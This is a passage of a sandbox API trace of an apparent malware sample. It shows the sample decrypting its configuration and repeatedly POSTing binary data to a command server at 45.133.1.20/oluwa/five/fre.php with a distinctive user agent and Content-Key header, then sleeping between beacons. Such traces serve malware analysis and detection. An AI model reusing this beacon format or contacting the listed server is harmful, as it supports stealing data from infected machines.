hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0306.624] GetProcessHeap () returned 0x6a0000 [0306.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0306.624] GetProcessHeap () returned 0x6a0000 [0306.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0306.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.633] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0306.641] GetProcessHeap () returned 0x6a0000 [0306.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0306.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.645] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0306.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.683] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.782] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.783] GetProcessHeap () returned 0x6a0000 [0306.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0306.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.786] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0306.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.840] CryptDestroyKey (hKey=0x6ad020) returned 1 [0306.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.843] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0306.843] GetProcessHeap () returned 0x6a0000 [0306.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0306.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.844] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0306.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.845] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0306.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.846] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0306.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.847] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0306.847] GetProcessHeap () returned 0x6a0000 [0306.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0306.848] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0306.848] GetProcessHeap () returned 0x6a0000 [0306.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0306.848] socket (af=2, type=1, protocol=6) returned 0xb9c [0306.848] connect (s=0xb9c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0306.876] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0306.876] GetProcessHeap () returned 0x6a0000 [0306.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0306.877] GetProcessHeap () returned 0x6a0000 [0306.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0306.878] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0306.879] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.879] GetProcessHeap () returned 0x6a0000 [0306.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6600 [0306.879] GetProcessHeap () returned 0x6a0000 [0306.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0306.880] GetProcessHeap () returned 0x6a0000 [0306.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0306.880] GetProcessHeap () returned 0x6a0000 [0306.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0306.881] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0306.882] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.882] GetProcessHeap () returned 0x6a0000 [0306.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0306.882] GetProcessHeap () returned 0x6a0000 [0306.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0306.882] send (s=0xb9c, buf=0x6bd460*, len=242, flags=0) returned 242 [0306.885] send (s=0xb9c, buf=0x6bb998*, len=159, flags=0) returned 159 [0306.885] GetProcessHeap () returned 0x6a0000 [0306.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0306.885] recv (in: s=0xb9c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0306.968] GetProcessHeap () returned 0x6a0000 [0306.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0306.968] GetProcessHeap () returned 0x6a0000 [0306.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0306.969] GetProcessHeap () returned 0x6a0000 [0306.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6600 | out: hHeap=0x6a0000) returned 1 [0306.970] GetProcessHeap () returned 0x6a0000 [0306.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0306.971] closesocket (s=0xb9c) returned 0 [0306.971] GetProcessHeap () returned 0x6a0000 [0306.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0306.972] GetProcessHeap () returned 0x6a0000 [0306.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0306.973] GetProcessHeap () returned 0x6a0000 [0306.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0306.974] GetProcessHeap () returned 0x6a0000 [0306.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0306.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d8) returned 0xb9c [0306.978] Sleep (dwMilliseconds=0xea60) [0306.980] GetProcessHeap () returned 0x6a0000 [0306.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0306.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0307.007] GetProcessHeap () returned 0x6a0000 [0307.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0307.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.009] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0307.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.010] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.011] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.083] GetProcessHeap () returned 0x6a0000 [0307.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0307.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.087] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0307.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.089] CryptDestroyKey (hKey=0x6ad020) returned 1 [0307.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.090] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0307.090] GetProcessHeap () returned 0x6a0000 [0307.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.091] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.093] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.095] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.096] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.096] GetProcessHeap () returned 0x6a0000 [0307.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0307.096] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.097] GetProcessHeap () returned 0x6a0000 [0307.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0307.097] GetProcessHeap () returned 0x6a0000 [0307.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0307.097] GetProcessHeap () returned 0x6a0000 [0307.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0307.098] GetProcessHeap () returned 0x6a0000 [0307.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0307.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.099] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.108] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0307.120] GetProcessHeap () returned 0x6a0000 [0307.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0307.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.121] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0307.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.123] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.124] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.124] GetProcessHeap () returned 0x6a0000 [0307.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0307.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.126] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0307.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.130] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0307.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.131] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0307.131] GetProcessHeap () returned 0x6a0000 [0307.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.133] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0307.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.134] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0307.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.136] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0307.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.148] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0307.148] GetProcessHeap () returned 0x6a0000 [0307.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0307.148] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0307.148] GetProcessHeap () returned 0x6a0000 [0307.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0307.148] socket (af=2, type=1, protocol=6) returned 0xba0 [0307.149] connect (s=0xba0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0307.178] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0307.178] GetProcessHeap () returned 0x6a0000 [0307.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0307.178] GetProcessHeap () returned 0x6a0000 [0307.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0307.179] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.180] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.180] GetProcessHeap () returned 0x6a0000 [0307.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b69c0 [0307.180] GetProcessHeap () returned 0x6a0000 [0307.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.181] GetProcessHeap () returned 0x6a0000 [0307.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0307.181] GetProcessHeap () returned 0x6a0000 [0307.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0307.182] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.183] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.183] GetProcessHeap () returned 0x6a0000 [0307.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0307.183] GetProcessHeap () returned 0x6a0000 [0307.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.183] send (s=0xba0, buf=0x6bd460*, len=242, flags=0) returned 242 [0307.183] send (s=0xba0, buf=0x6bb998*, len=159, flags=0) returned 159 [0307.184] GetProcessHeap () returned 0x6a0000 [0307.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0307.184] recv (in: s=0xba0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0307.268] GetProcessHeap () returned 0x6a0000 [0307.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0307.269] GetProcessHeap () returned 0x6a0000 [0307.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0307.270] GetProcessHeap () returned 0x6a0000 [0307.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b69c0 | out: hHeap=0x6a0000) returned 1 [0307.270] GetProcessHeap () returned 0x6a0000 [0307.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0307.270] closesocket (s=0xba0) returned 0 [0307.271] GetProcessHeap () returned 0x6a0000 [0307.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0307.271] GetProcessHeap () returned 0x6a0000 [0307.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0307.271] GetProcessHeap () returned 0x6a0000 [0307.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0307.272] GetProcessHeap () returned 0x6a0000 [0307.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0307.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18dc) returned 0xba0 [0307.276] Sleep (dwMilliseconds=0xea60) [0307.278] GetProcessHeap () returned 0x6a0000 [0307.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0307.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.510] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0307.519] GetProcessHeap () returned 0x6a0000 [0307.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0307.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.520] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0307.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.521] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.522] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.522] GetProcessHeap () returned 0x6a0000 [0307.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0307.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.525] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0307.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.528] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0307.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.529] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0307.529] GetProcessHeap () returned 0x6a0000 [0307.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.531] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.532] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.534] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.534] GetProcessHeap () returned 0x6a0000 [0307.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0307.534] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.534] GetProcessHeap () returned 0x6a0000 [0307.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0307.535] GetProcessHeap () returned 0x6a0000 [0307.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0307.538] GetProcessHeap () returned 0x6a0000 [0307.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0307.539] GetProcessHeap () returned 0x6a0000 [0307.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0307.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.541] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0307.563] GetProcessHeap () returned 0x6a0000 [0307.563] RtlAllocateHeap 